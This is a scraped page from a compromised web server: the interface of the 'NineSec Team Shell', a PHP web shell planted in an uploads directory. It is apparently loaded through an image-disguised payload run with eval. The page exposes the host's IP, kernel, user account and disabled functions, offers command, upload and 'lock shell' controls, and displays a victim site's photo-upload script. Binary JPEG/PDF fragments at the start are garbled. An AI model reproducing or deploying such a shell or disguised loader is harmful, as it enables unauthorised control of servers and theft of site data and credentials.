JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/photosubmit.php
<?php
include 'db_connect.php'; // Ensure this connects to the pinkrose DB

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $uploadDir = "uploads/";
    $uploadedFiles = [];
    $errors = [];

    // Validate year input
    // Changed $_POST['date'] to $_POST['year']
    $year = isset($_POST['year']) ? trim($_POST['year']) : '';

    if (empty($year)) {
        die("Year is required.");
    }

    // Proceed with image upload and DB insert...


    // Upload files from form: photos1, photos2, photos3, photos4
    $photoFields = ['photos1', 'photos2', 'photos3', 'photos4'];

    foreach ($photoFields as $field) {
        if (isset($_FILES[$field]) && $_FILES[$field]['error'] === 0) {
            $originalName = basename($_FILES[$field]['name']);
            $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));

            // Only allow image files
            if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'])) {
                $errors[] = "$originalName is not a valid image.";
                $uploadedFiles[] = ""; // maintain index
                continue;
            }

            $newName = uniqid() . '_' . $originalName;
            $destination = $uploadDir . $newName;

            if (move_uploaded_file($_FILES[$field]['tmp_name'], $destination)) {
                $uploadedFiles[] = $newName;
            } else {
                $errors[] = "Failed to upload $originalName.";
                $uploadedFiles[] = "";
            }
        } else {
            $errors[] = "Error uploading $field.";
            $uploadedFiles[] = "";
        }
    }

    // If there were errors, stop execution
    if (!empty($errors)) {
        echo "<h3>Upload Errors:</h3>";
        foreach ($errors as $err) {
            echo htmlspecialchars($err) . "<br>";
        }
        exit;
    }

    // Insert into your table
    $stmt = $conn->prepare("INSERT INTO photo_submissions (year, photo1, photo2, photo3, photo4) VALUES (?, ?, ?, ?, ?)");
    $stmt->bind_param("sssss", $year, $uploadedFiles[0], $uploadedFiles[1], $uploadedFiles[2], $uploadedFiles[3]);

    if ($stmt->execute()) {
        echo "<h3>Photos uploaded and saved successfully!</h3>";
        header("Location: photo-form.php?success=1");
    } else {
        echo "Database error: " . $stmt->error;
    }

    $stmt->close();
    $conn->close();
}
?>

NineSec Team - 2022